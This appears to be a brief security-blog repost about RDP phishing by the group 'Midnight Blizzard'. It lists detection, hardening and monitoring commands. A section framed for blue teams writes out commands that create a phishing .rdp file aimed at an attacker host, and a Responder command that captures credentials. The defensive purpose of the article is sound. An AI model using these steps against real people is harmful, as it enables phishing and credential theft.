A Midnight Blizzard Special: Simulating an RDP Phishing Campaign

By /

Listen to this Post

Featured Image
Remote Desktop Protocol (RDP) is a powerful tool for legitimate remote access, but it can also be weaponized by Advanced Persistent Threat (APT) groups like ‘Midnight Blizzard’. This article explores how attackers leverage malicious `.rdp` files in phishing campaigns to gain initial access and establish command and control (C2).

How the Attack Works

1. Spear Phishing with Malicious RDP Files

  • Attackers send emails with `.rdp` attachments disguised as legitimate requests.
  • The file contains pre-configured credentials or connects to a malicious RDP server.

2. Initial Access & Execution

  • Once opened, the RDP file connects to an attacker-controlled server.
  • Attackers harvest credentials or deploy additional payloads.

3. Lateral Movement & Persistence

  • Attackers move laterally using tools like `Mimikatz` or Cobalt Strike.
  • They establish persistence via scheduled tasks or registry modifications.

You Should Know:

1. Detecting Malicious RDP Files

  • Check for suspicious RDP file parameters: 
    grep -i "full address:s" suspicious.rdp 
grep -i "username:s" suspicious.rdp
  • Use `rdp-tools` to inspect RDP files: 
    python3 rdp-checker.py malicious.rdp

2. Preventing RDP-Based Attacks

  • Disable RDP if not needed: 
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
  • Enable Network Level Authentication (NLA): 
    Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 1

3. Monitoring RDP Connections

  • Check active RDP sessions (Windows): 
    qwinsta /server:localhost
  • Log RDP connections (Linux): 
    journalctl -u xrdp -f

4. Simulating an RDP Attack (For Blue Teams)

  • Generate a malicious RDP file: 
    echo "full address:s:attacker-ip" > phishing.rdp 
echo "username:s:victim" >> phishing.rdp
  • Capture credentials with Responder: 
    sudo responder -I eth0 -wrf

What Undercode Say

RDP remains a prime target for APTs due to its widespread use and weak default configurations. Organizations must enforce strong authentication (MFA), monitor RDP logs, and train users to recognize phishing attempts.

Expected Output:

  • Detected RDP brute-force attempts in logs.
  • Identified unusual RDP session times.
  • Blocked malicious `.rdp` files via email filtering.

Prediction

As cloud-based RDP solutions grow, attackers will shift to exploiting misconfigured cloud RDP instances. Zero-trust policies and strict access controls will become critical defenses.

Reference: A Midnight Blizzard Special: Simulating an RDP Phishing Campaign — PT 1

IT/Security Reporter URL:

Reported By: Nathaniel Bair – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: